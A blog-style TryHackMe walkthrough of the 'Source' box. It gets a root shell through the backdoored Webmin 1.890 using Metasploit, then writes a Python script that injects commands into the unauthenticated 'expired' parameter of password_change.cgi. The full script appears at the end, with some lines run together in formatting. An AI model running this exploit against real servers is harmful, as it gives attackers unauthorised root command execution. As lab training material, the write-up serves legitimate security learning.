SOURCE TRYHACKME WALKTHROUGH AND EXPLOIT DEVELOPMENT OF SOURCE WEBMIN VULNERABILITY USING PYTHON
Hello guys back again with another walkthrough and this time am going to be taking you guys through how i solved source from TryHackMe the box is really simple with very few steps we’ll use metasploit module to get a shell on the box as the root user so i decided to show you guys how to create a python exploit script to do the same. Without much say let’s jump in
As always we’ll start off with a nmap scan and as seen below we have two ports that are open ssh and HTTP
I decided to google to see if those versions had vulnerability and webmin 1.890 had remote code execution vulnerabilities
1. MiniServ 1.890 (Webmin httpd) which is vulnerable to remote code execution vulnerability though a backdoor that was planted on the source codeSince the webmin vulnerability sounded juicy i decided to try it first and what makes our job even easier to exploit is that A remote, unauthenticated attacker can exploit this to execute arbitrary commands without knowing the valid credential from the server sweet and dangerous right !!!!
The vulnerability exists in the “expire” parameter. If we pass a system command it gets executed. Doing some more google search we get a metasploit module for the attack so i decided to load metasploit and then filled the required parameters as seen below
N/B MAKE SURE SSL IS SET TO TRUE SINCE THE SERVER IS RUNNING OON HTTPS
And i ran the exploit and after a few second got a shell
And after upgrading my shell i was root on the box
Now we can submit both the user and root flag and get the points
And the box is done!!!!
CREATING A PYTHON SCRIPT TO AUTOMATE THE EXPLOITATION
As an attacker just exploiting a vulnerability isn’t enough it beneficial to know exactly what happens behind the scene (NOT JUST GETTING A SHELL ) because knowing this enable you a cybersecurity researcher or penetration tester or hacker to reproduce the exploit if you were asked to. And for this walkthrough I’ll be using python programming language since it’s the easiest and most efficient to write exploits. Below is a python script that i wrote that executes commands on the system and outputs the result of the command
For this tutorial am going to be using VSCodium a VSCode version of parrotOS which i really love and i will use an extension called arepl which it run the python code in real time as am writing and also gives a warning if there are any errors in my code while am writing
Let’s jump right in
First well need to import requests library which will handle our HTTP requests and sys will allow us to perform http requests
Now I’ll define a variable cmd which will contain the command to be executed
Now I’ll define the second variable host that will contain the the hosts IPAddress
The third variable will contain the URL as seen below
Now I’ll define the last variable called sess that will save all the session cookies that i make to the web server
Next I’ll create a variable called data with post data parameters (user, pam, expired, old, new1 and new2) this are the postdata that I’ll send to the web server and if you see clearly my cmd variable will be injected in the expired parameter in the post data
Now it’s time to send our first request to the server using the The password_change.cgi which changes the password of the webmin server using a post parameter and we’ll send our postdata defined above to the URL
But as seen from the URL we get a certificate verification failed error we can simply bypass this by telling request not to verify the certificate as seen below
And voila as seen below the error is gone
Now to get an output of the request made to the server we use print command
And voila as seen above the request was submitted successfully but we get an error from webmin because we don’t have a referer in out header which contains address of the previous web page from which a link to the currently requested page was followed. The Referer header allows servers to identify where people are visiting them from and may use that data for analytics, logging, or optimized caching
So Next we add a referer in our request header using the header tag in the URL using the syntax below
exploit = sess.post(url, data=postdata, verify=False, headers = {"Referer": "https://" + host + ":10000/session_login.cgi"}).textAnd after adding the referer we get an output of ifconfig system command
Doing a directory listing using the cmd variable we get an output
That was simple right our exploit works perfectly right
Now we can go a step further and add arguments that will allow us to pass arguments to our python script
Now the first argument that well pass to our script is the IPAddress and the second argument is command to be executed let’s try executing the python script in our terminal and see if it works
And voila as seen above our script works fine now i’ll leave an assignment for you to try removing the certification verification error and try using regular expression to remove the unwanted information from the screen so that only the system command can be printed in the screen
But the script that i created i here below
import requests
import syshost = "10.10.134.87"
cmd = "ifconfig"
url = "https://" + host +":10000/password_change.cgi"
sess = requests.session()postdata = {
"user" : "pleaselikethewalkthrough",
"pam" : "",
"expired" : cmd,
"old" : "root",
"new1" : "newpassword",
"new2" : "newpassword"
}
exploit = sess.post(url, data=postdata, verify=False, headers = {"Referer": "https://" + host + ":10000/session_login.cgi"}).textprint(exploit)
You can use it and modify however you want guys
That’s it for now guys till next time take care and if you liked the walkthrough you can clap for me down below